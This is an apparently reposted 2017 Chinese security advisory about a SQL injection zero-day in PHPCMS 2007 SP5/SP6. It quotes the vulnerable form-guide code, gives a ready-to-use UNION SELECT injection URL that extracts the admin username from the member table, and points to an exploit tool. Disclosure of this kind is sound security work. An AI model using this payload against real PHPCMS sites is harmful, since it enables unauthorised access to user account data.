phpcms injection 三八贺岁 0day 's

admin
admin
admin
139803
文章
114
评论
2017年4月29日05:05:27评论304 views字数 703阅读2分20秒阅读模式
摘要

鬼仔注:我没测试,这次是以为朋友投递的。感谢sniperhg的投递!影响版本:2007SP5 SP6
漏洞文件:/formguide/include/tag.func.php
Author:backerhack 小蟑螂
信息来源:零客网安 www.0kee.com
祝全国女性同胞们节日快乐,关注女性健康… “她好,我也好”
————灰常淫荡的分割线——————————————————-

{
global $db,$MOD,$MODULE;
$formid = (!isset($formid)||$formid=='') ? 0 : $formid;
$query = "SELECT * FROM ".TABLE_FORMGUIDE." WHERE formid=$formid limit 1";
$r = $db->get_one($query);
if(!$r)
{
echo $LANG['not_exist_form'];
return '';
}

鬼仔注:我没测试,这次是以为朋友投递的。

感谢sniperhg的投递!

影响版本:2007SP5 SP6
漏洞文件:/formguide/include/tag.func.php
Author:backerhack 小蟑螂
信息来源:零客网安 www.0kee.com
祝全国女性同胞们节日快乐,关注女性健康… “她好,我也好”
————灰常淫荡的分割线——————————————————-

{
global $db,$MOD,$MODULE;
$formid = (!isset($formid)||$formid=='') ? 0 : $formid;
$query = "SELECT * FROM ".TABLE_FORMGUIDE." WHERE formid=$formid limit 1";
$r = $db->get_one($query);
if(!$r)
{
echo $LANG['not_exist_form'];
return '';
}

变量formid未赋值且过滤不严带入查询导致注入。
测试:http://phpcmsroot/formguide/index.php?formid=1/**/and/**/1=2/**/union/**/select/**/1,username,3,4,5,6,7/**/from/**/phpcms_member/**/where/**/userid=1/*
附上sniperhg写的利用工具… 写的真的很强大,赞一个!
phpcms0dayEXP.exe MD5值:cae31a3ef566ed06068473d787d76359
本文发表前已通知官方。

injection.rar

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月29日05:05:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpcms injection 三八贺岁 0day 'shttps://cn-sec.com/archives/47503.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息